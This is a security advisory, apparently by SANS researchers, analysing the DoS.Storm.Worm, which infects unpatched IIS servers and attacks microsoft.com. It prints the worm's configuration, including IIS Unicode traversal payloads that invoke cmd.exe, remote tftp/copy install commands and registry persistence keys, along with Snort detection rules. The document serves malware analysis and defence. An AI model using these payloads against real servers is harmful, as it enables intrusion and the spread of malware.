DoS.Storm.Worm is a worm that seeks out Microsoft Internet Information Services (IIS) systems that have not applied the proper security patches. Any such systems that it finds are then infected with the worm. The payload of this worm performs a denial of service attack on www.microsoft.com.
Credit:
This write up can be found at:
http://www.incidents.org/react/dosstormworm.php
The information has been provided by Matt Fearnow of the SANS Institute, Johannes Ullrich of the SANS Institute and Lenny Zeltser and NIPC Labs.
The Trojan is packed using UPX (the Ultimate Packer for eXecutables) and is written in Java. The main 'wrapper' class is 'runner.class'. It starts the various pieces.
1. Read 'datastore'
'datastore' is a class that is handed along and carries a number of configuration parameters. When 'datastore' is first instantiated, it looks for 'storm.cfg' and overwrites any default parameters with the values it finds in storm.cfg. A new storm.cfg is written if it does not exist.
2. Send e-mail to 'emailreceive' (@gmx.net)
The body of the e-mail is one line listing the host name and IP address of the infected machine followed by the word 'startup.'
3. Setup TFTPd.
This starts a TFTP daemon on port 69.
4. Start 'scanner'.
This part sends a series of request strings to each host's web server. First, the server version is queried to check whether the host runs IIS (see the 's' strings in datastore). The probe strings are listed in 'datastore' and start with 'v' (e.g. v1, v2 ...); the response is compared to the 'r' strings (r1, r2 ...) in datastore.
For vulnerable hosts, the 'installer' will then try to install (and start) storm on the new machine. See the 'copy' and 'start' variables in datastore. The installer verifies that the new copy is running.
5. Start 'telnetd'
Starts a telnet server at the port given by 'telnetport' in datastore (default 23001). The username and password are given in 'user' and 'pwd'.
6. Start 'dosd'
Dosd accesses each URL listed in datastore variables starting with 'dos'. By default, this is 'http://www.microsoft.com'
7. Start 'bombd'
Sends an e-mail to each address listed in datastore with a variable name starting with 'bomb' (e.g. bomb1). By default: gates@microsoft.com. The text of the message is in 'bombtext'.
8. Start consoled
Opens a console on port 23000 (or 'consoleport') using the same username and password as telnetd. This appears to be usable for remotely configuring storm and overwriting various parameters in datastore.
9. Modify registry.
All 'datastore' variables that start with 'register' are additions to the system registry. By default, only two are used, 'register1' and 'register2', to start storm on reboot.
10. 'mailer'
Mailer sends an e-mail to the SMTP server specified in datastore (by default: mail.gmx.net). It uses a username/password to authenticate itself.
--- default parameters from 'datastore.class' ---
banner=*********************** Storm (c) Agberd Celine 2000 ***********************
version=Storm v1.0
installed=?/c+tftp.exe+\
extract=?/c+storm.exe+\
run=?/c+c:\\winnt\\system32\\storm\\start.bat
extractresult=CGI
runresult=started.
smtp=mail.gmx.net
host=replacer
ttl=10000000
tftpdir=c:\\winnt\\system32\\storm\\
telnetport=23001
consoleport=23000
dos1=http://www.microsoft.com
copy=?/c+copy+storm.exe+c:\\winnt\\system32\\storm
copyresult=CGI
bomb1=gates@microsoft.com
bombtext=Fuck you!
check=?/c+dir
v1=/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe
v2=/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe
v3=/scripts/..%c1%1c../..%c1%1c../mssql7/install/pubtext.bat+&+cmd.exe /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe=installedresult
r1=c:
r2=d:
r3=e:
r4=C:
r5=D:
r6=E:
s1=Server:Microsoft-IIS/4.0
s2=Server:Microsoft-IIS/5.0
register1= HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\RunService\\666=c:\\winnt\\system32\\storm\\start.bat
register2= HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\Run\\666=c:\\winnt\\system32\\storm\\start.bat
shell=cmd.exe
systemlog1=Systemlog
Detection:
Snort will pick up the probes to IIS with these rules, which are available from whitehats.com and snort.org:
http://www.whitehats.com/cgi/arachNIDS/Show?_id=ids452&view=signatures
alert TCP $EXTERNAL any -> $INTERNAL 80 (msg: "IDS452/web-iis_http-iis-unicode-binary"; flags: A+; content: "..|c0af|";nocase;)
http://www.whitehats.com/cgi/arachNIDS/Show?_id=ids432&view=signatures
alert TCP $EXTERNAL any -> $INTERNAL 80 (msg: "IDS432/web-iis_http-iis-unicode-traversal"; flags: A+; content: "..|25|c1|25|1c"; nocase;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-MISC Attempt to execute cmd"; flags: A+; content:"cmd.exe"; nocase;)
Removal:
Symantec AntiVirus is able to detect this worm, and Symantec provides a simple 'how to' for cleaning your system:
http://www.symantec.com/avcenter/venc/data/dos.storm.worm.html
This security advisory was prepared by Matt Fearnow of the SANS Institute and Johannes Ullrich of the SANS Institute.
Lenny Zeltser and NIPC Labs also contributed.